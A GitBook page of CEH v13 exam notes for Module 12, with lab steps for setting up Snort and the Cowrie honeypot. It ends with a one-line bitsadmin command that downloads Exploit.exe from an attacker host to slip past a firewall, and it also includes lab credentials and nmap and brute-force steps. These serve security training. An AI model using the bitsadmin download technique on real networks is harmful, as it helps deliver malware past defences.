πŸ•ΉοΈ
Ghoulsec Vault
Website Toolbase
  • Welcome !
  • πŸ—ƒοΈExam Prep Notes
    • πŸ“”CEH V13 (Master Edition)
      • Module 02: Footprinting and Reconnaissance
      • Module 03: Scanning Networks
      • Module 04: Enumeration
      • Module 05: Vulnerability Analysis
      • Module 06: System Hacking
      • Module 07: Malware Threats
      • Module 08: Sniffing
      • Module 09 : Social Engineering
      • Module 10: Denial of Service
      • Module 11: Session Hijacking
      • Module 12: Evading IDS, Firewalls , Honeypots
      • Module 13: Hacking web servers
      • Module 14: Hacking Web Applications
      • Module 15:SQL Injection
      • Module 16: Wireless Attacks
      • Module 17: Hacking Mobile Platforms
      • Module 18: IoT & OT Hacking
      • Module 19 : Cloud Computing
      • Module 20 : Cryptography
    • πŸ“˜ISC2 -Certified in Cyber Security
      • Chapter -1 Security Principals
      • Chapter -2 Disaster Recovery,Business Continuity & Incident Response
      • Chapter -3 Access Control Concepts
      • Chapter -4 Network Security
      • Chapter -5 Security Operations
    • πŸ“—AZ - 900
      • Basics of Cloud Computing
        • Economic of Scale
        • CapEx & OpEx
        • Consumption based model
        • Cloud Deployment Models
        • Shared Responsibility Model
        • Data centers, Regions & Availability Zones & Geographyies in Azure
        • Resources & Resource Group
        • Azure Access Tools
        • Azure Service Lifecycle
        • Azure SLAs
        • Azure Cloud Adoption Framework
      • Azure Services
        • Azure Computing Services
        • Azure Networking Services
        • Azure Storage Services
        • Azure Database Service
        • Azure Marketplace
        • Big Data & Azure
        • Azure Serverless Computing
        • IoT & Azure
        • Other Azure Services
        • Azure Resource Locks & Resource Tags
        • Azure Security Services
          • Security Groups
          • Routing Tables
          • Azure Firewall
          • Azure DDOS Protection
          • Azure Identity & Access Management (Azure AD)
          • Azure RBAC
          • Azure Security Center
          • Azure Key Vault
      • Azure policies & Blueprints
      • Azure Cost Management
      • Azure Core Tenents
    • πŸ“—SC - 900
      • Zero Trust Model
      • Shared Responsibility Model
      • Defense in Depth
      • Security Controls
      • CIA Triad
      • Encryption / Hashing / Signing
      • Microsoft Security & Compliance Principals
      • Common Identity Attacks
      • Microsoft Identity as Primary Security Perimeter
      • Modern Authentication with Azure AD
      • Azure AD Identity Types
      • Azure External Identities
      • Hybrid Identities
      • Authentication Methods & Password Protection
      • Conditional Access
      • Azure AD Roles & RBAC
      • Governance in Azure AD
      • Azure Identity Protection
      • Azure NSG, DDOS, Firewall
      • Azure Bastion & Keyvault
      • Azure Encryption
      • Azure CSPM
      • Azure Security Center
      • Azure Defender
        • Microsoft O365 Defender
        • Azure Sentinel
      • Microsoft Cloud App Security
      • Microsoft Intune
      • Microsoft Complaince Manager
      • Information Protection
      • Microsoft insider risk capabilities
    • πŸ“”AWS Cloud Practitioner
      • Cloud Deployment
        • AWS Global Infrastructure
      • AWS Cloud Essentials
        • AWS SNS
          • AWS SQS
      • AWS Compute & Container Services
        • AWS EC2
          • Elasticity & Agility
        • AWS Serverless Computing
        • AWS Container Services
        • AWS Beanstalk
        • AWS Load Balancing
      • AWS Storage & Databases
      • AWS Networking
      • AWS Security
        • AWS Organisation
        • AWS Compliance
        • AWS DDOS
        • Additional Security Services
      • AWS Monitoring & Analytics
        • Other Analytics Services
      • AWS Pricing & Support
      • AWS Migration & Innovation
        • Migration Statergies
        • AWS Snow Family
        • AWS Transfer Family
        • Innovation on AWS
      • AWS Well Architecture Framework
      • Other AWS Services
  • πŸ§‘β€πŸ’»Cyber Security Base
    • Ghoul's Den
    • Cheatsheets
    • SSL Handbook
      • Installing OpenSSL
      • Encrypting Web Servers using SSL
      • Compiling .pfx file using openssl
      • De-compiling .pfx file
      • Zimbra Mail Server SSL renew
      • SSL Certificates
    • ☁️Cloud Security
      • Amazon Web Services (AWS)
        • AWS - IAM & Policy Management
        • AWS Organization
        • AWS - Roles (Assume Role)
        • AWS - EC2 (Elastic Computing)
        • AWS - VPC
        • AWS - Bastion Host
        • AWS Application Load Balancer
        • AWS Auto Scaling Group
        • AWS WAF
        • AWS - VPC Peering
        • AWS Transit Gateway
        • AWS NAT Gateway
        • AWS - Route 53
        • AWS Certificates Manager
        • AWS Network Load Balancer (NLB)
    • πŸ•ΈοΈNetwork Security
      • Firewalls
        • Sophos - Security Suite
          • Sophos Firewalls
      • VPN
        • VPNs
          • Wireguard Tunneling
          • StrongSwan Gateway VPN Server on Ubuntu
      • IP Address and IP Subnetting
      • Basic to Advance Networking Materials
    • πŸ§‘β€πŸ’»VAPT
      • Sample Report Templete
      • OWASP
        • OWASP Web Application Security & WebGoat
      • Web Application testing checklist
        • Client Side Penetration Testing
          • Clickjacking
          • Websockets
          • CSRF
          • XSS Filters
        • Server Side Penetration Testing
        • Advanced Web Application Pentesting
          • OAuth
          • JWT Injection
          • Server Side Templete Injection
    • β˜„οΈGRC
      • ISMS AUDIT PLAN
      • CIS Compliance Windows
    • πŸ”Forensic
      • Forensic Tools
      • EMAIL Forensics
      • File header forensics
    • Trend Micro
      • Deep Security
        • Installation & Prerequisite
          • Microsoft SQL server 2022
          • Postgres 16 Core
          • Installation
    • Practical Malware Analysis & API Threats
  • πŸ•ΉοΈServer are fun !
    • Securing Linux
      • Securing SSH
      • Sudoers
      • UFW (Uncomplicated FW)
      • Unattended Upgrades
      • Password Complexiety
      • Auditing Linux
      • Samba - SMB
      • NFS - Network File System
      • FTP
      • AIDE
    • Servers
      • Linux Sever
        • OpenLDAP Server Setup
          • ldap-account-manager
          • Securing OpenLDAP
          • OpenLDAP client setup
          • Checking LDAP setup
        • Users & Groups
        • Password Policy
        • File & File Permissions
        • Automatic Updates
        • Adding GUI to Ubuntu Server
        • DNS Server
        • NTP Server
      • Windows Sever
        • Deep dive into Windows Server
        • Windows server Installation
        • Disable IPv6
        • Disable Server Manager on startup
        • Promoting OS to AD server
        • AD DNS
        • AD DHCP
        • AD Activation
        • AD Users & Groups
        • AD FileServer
        • Adding Users into AD
        • Bulk Importing users into Domain
        • Windows AD Resources
        • Group Policy Editor
          • Creating First Policy
          • Restricting CMD & Powershell
          • Password Policies
          • Audit Policies
          • Log Retention Policy
          • Windows Defender Firewall
          • Patch Management & Window Updates
        • Setting Up local accounts for windows hosts
    • Hacking Systems
      • Linux Systems
        • Battery Charge Threshold (Linux)
        • Metasploitable OS Complete Solved
      • Tricking Windows
        • Bitlocker & Time based policy bypass
    • Monitoring HeartBeats
    • RAID Technology
    • Managing Partitions
      • Parted
      • Fdisk
      • LVM
        • Re-claiming unused disk space
        • Adding physical volume into VG
        • Removing physical volume from VG
      • SWAP Memory
    • Virtualization
      • Proxmox
        • Proxmox VE Installation
        • Default Storage Expansion
        • Proxmox Network Link Aggegration
        • NAT Interface Configuration
        • Importing disk into proxmox
        • Creating an LVM Thin Pool
        • Proxmox IAM
  • πŸ™β€β™‚οΈDan the AI Expert
    • Ollama Ollama ...
      • Ollama
        • Ollama models
        • Open Web UI & Ollama Integration
    • Microsoft Presentation using AI
  • πŸ›‘οΈSecurity Operations
    • Wazuh - Open Source XDR. Open Source SIEM.
      • Components
      • Deployment Methods
      • Installation
        • Single Node Installation
          • Wazuh Indexer Installation
          • Wazuh Server Installation
          • Wazuh Dashboard Installation
          • Single node deployment with Script
        • Managing multiple Wazuh clusters with Cross-Cluster Search
          • Cluster Configuration
          • Set up Cross-Cluster Search
        • Upgrading Wazuh Central Components
        • Uninstalling Wazuh
      • Custom Decoder & Rules
        • Pfsense Decoders
        • Pfsense Rules
      • Security Operations Center Tools (Wazuh)
    • IRIS-DFIR / Case Management
    • Graylog & ElasticSearch
    • Zabbix NMS
      • Zabbix Installation
      • Zabbix Database Management
        • Zabbix Database backup
        • Zabbix Database restore
        • MySQL Replication (M-M)
        • MySQL Replication (M-W)
      • Zabbix Geomap Setup
      • Adding Hosts into Zabbix
      • Zabbix Hostgroups
      • Auto Registration Hosts Zabbix
      • Zabbix Globalscrips
      • Zabbix HA Cluster
      • Zabbix Proxy
      • Zabbix Notifications
      • Zabbix Maintainance
      • Zabbix User Management & Authentication
      • Zabbix Housekeeping
      • Scheduled Reporting
      • Service Monitoring using Zabbix
  • Git the master!!
    • Configuring git
    • Git Branches
    • Undoing changes
    • Git - Cheat sheet
    • My first git...
Powered by GitBook
On this page
  • Lab 1: Perform Intrusion Detection using Various Tools
  • Task 1: Detect Intrusions using Snort
  • Task 2: Deploy Cowrie Honeypot to Detect Malicious Network Traffic
  • Lab 2: Evade IDS/Firewalls using Various Evasion Techniques
  • Task 1: Evade Firewall through Windows BITSAdmin
  1. Exam Prep Notes
  2. CEH V13 (Master Edition)

Module 12: Evading IDS, Firewalls , Honeypots

Ethical hackers or pen testers use numerous tools and techniques to evade the IDS and firewall on the target network. Recommended labs that will assist you in learning various evasion techniques include:

  1. Perform intrusion detection using various tools

    • Detect intrusions using Snort

    • Deploy Cowrie honeypot to detect malicious network traffic

  2. Evade ids/firewalls using various evasion techniques

    • Evade firewall through Windows BITSAdmin

Lab 1: Perform Intrusion Detection using Various Tools

Task 1: Detect Intrusions using Snort

1. Snort Installation:

  • Launch the Windows 11 machine and log in as Admin using Pa$$w0rd.

  • Navigate to the Snort installation directory (E:\CEH-Tools\CEHv13 Module 12\Intrusion Detection Tools\Snort) and run the Snort installer (Snort_2_9_15_Installe.x64.exe).

  • Accept the license agreement and follow the installation wizard to install Snort. The default install location is C:\Snort.

2. Copy Configuration Files:

  • Copy the necessary configuration files (e.g., snort.conf, so_rules, preproc_rules, and rules folders) from the provided location (E:\CEH-Tools\...) to C:\Snort.

  • Replace any existing files in the C:\Snort\etc folder with the new ones.

3. Initial Snort Setup:

  • Open a Command Prompt and navigate to C:\Snort\bin.

  • Run snort to initialize Snort and then use snort -W to list your network interfaces.

  • Identify the Ethernet Driver index (e.g., 1), and enable it using the command: snort -dev -i 1.

4. Test Snort:

  • Leave the Snort window running and open another command prompt.

  • Run a ping command (ping google.com) from the same machine to trigger a Snort alert.

  • Verify that Snort detects the ping probe and generates an alert.

5. Configure snort.conf:

  • Open the snort.conf file in Notepad++.

  • Modify network variables in the snort.conf file:

    • Set HOME_NET to the IP address of the Windows 11 machine (e.g., 10.10.1.11).

    • Leave EXTERNAL_NET as any.

    • Set other server variables (e.g., DNS_SERVERS, SMTP_SERVERS, etc.) as needed.

  • Update RULE_PATH, so_rules, and preproc_rules to the correct paths (e.g., C:\Snort\rules).

  • Configure dynamic preprocessor libraries with the correct paths.

  • Comment out unnecessary preprocessor rules.

  • Set output plugin paths for classification.config and reference.config.

  • Replace ipvar with var to ensure proper configuration.

6. Enable Detection Rules:

  • Navigate to the C:\Snort\rules directory and enable ICMP rules by editing icmp-info.rules.

  • Modify the rule to detect ICMP ping probes directed at the system (e.g., alert icmp $EXTERNAL_NET any -> $HOME_NET 10.10.1.11).

7. Run Snort in IDS Mode:

  • Run Snort using the command:

    mathematicaCopy codesnort -iX -A console -c C:\Snort\etc\snort.conf -l C:\Snort\log -K ascii

    Replace X with the Ethernet interface index (e.g., 1).

  • Snort starts in IDS mode, initializes, and waits for attacks.

8. Simulate an Attack:

  • Switch to the Windows Server 2019 (Attacker machine) and use the command:

    Copy codeping 10.10.1.11 -t

    (Replace 10.10.1.11 with the actual IP address of the Windows 11 machine).

  • Snort on Windows 11 detects this ping and triggers an alert.

9. Check Snort Logs:

  • After Snort detects the attack, go to the Snort log directory (C:\Snort\log\10.10.1.11) and open the ICMP_ECHO.ids file.

  • The log file contains entries of detected attacks.

10. Completion:

  • The Snort IDS successfully detected and logged the attack (ping), indicating that the setup was successful.

  • Close all open windows on both machines.


Task 2: Deploy Cowrie Honeypot to Detect Malicious Network Traffic

1. Create Cowrie User and Prepare Environment:

  • Login to Ubuntu: Use Ubuntu/toor credentials.

  • Create a new user cowrie (with no password) by running:

    cssCopy codesudo adduser --disabled-password cowrie

    Follow the prompts and confirm.

2. Access Cowrie Files:

  • Navigate to CEH-Tools: Open Files on the Ubuntu machine and copy the cowrie folder from the network share (10.10.1.11/CEHv13 Module 12...) to /home/ubuntu.

  • If ceh-tools is not visible, Connect to Server (smb://10.10.1.11), enter credentials (Admin/Pa$$w0rd), and navigate to the cowrie folder.

3. Install Dependencies:

  • Open a terminal and switch to root user:

    Copy codesudo su
  • Navigate to cowrie directory and install dependencies:

    bashCopy codecd cowrie
    pip install --upgrade -r requirements.txt
  • Change to /home/ubuntu and modify file permissions:

    bashCopy codechmod -R 777 cowrie

4. Set Up Port Redirection:

  • Redirect SSH traffic (port 22) to Cowrie's port 2222 using iptables:

    cssCopy codeiptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222

5. Configure Cowrie to Run on Port 22:

  • Use authbind to allow the cowrie user to bind to port 22:

    bashCopy codetouch /etc/authbind/byport/22
    chown cowrie:cowrie /etc/authbind/byport/22
    chmod 770 /etc/authbind/byport/22

6. Create Virtual Environment:

  • Create and activate a Python virtual environment:

    bashCopy codevirtualenv --python=python3 cowrie-env
    source cowrie-env/local/bin/activate

7. Start Cowrie Honeypot:

  • Navigate to the cowrie directory and start the honeypot:

    bashCopy codebin/cowrie start

8. View Cowrie Logs:

  • Open the log file to check for incoming SSH connections:

    bashCopy codecd /var/log/cowrie/
    tail cowrie.log
  • Ensure that the log shows: "Ready to accept SSH connections."

9. Simulate Attacks from Parrot Security:

  • Switch to Parrot Security machine and run nmap to scan for open ports on the target:

    cssCopy codenmap -p- -sV 10.10.1.9
  • You should see port 22 open, indicating the honeypot is running on this port.

  • Attempt SSH Brute-Force: Use PuTTY to attempt SSH login (use ubuntu/toor or random credentials). The connection will be redirected to the Cowrie honeypot.

10. Observe Attack in Cowrie Logs:

  • Switch back to Ubuntu machine and run:

    bashCopy codetail cowrie.log
  • The log will capture the attacker’s SSH connection attempts and interactions.


Lab 2: Evade IDS/Firewalls using Various Evasion Techniques

Task 1: Evade Firewall through Windows BITSAdmin

bitsadmin /transfer Exploit.exe http://10.10.1.13/share/Exploit.exe c:\Exploit.exe
PreviousModule 11: Session HijackingNextModule 13: Hacking web servers

Last updated 5 months ago

πŸ—ƒοΈ
πŸ“”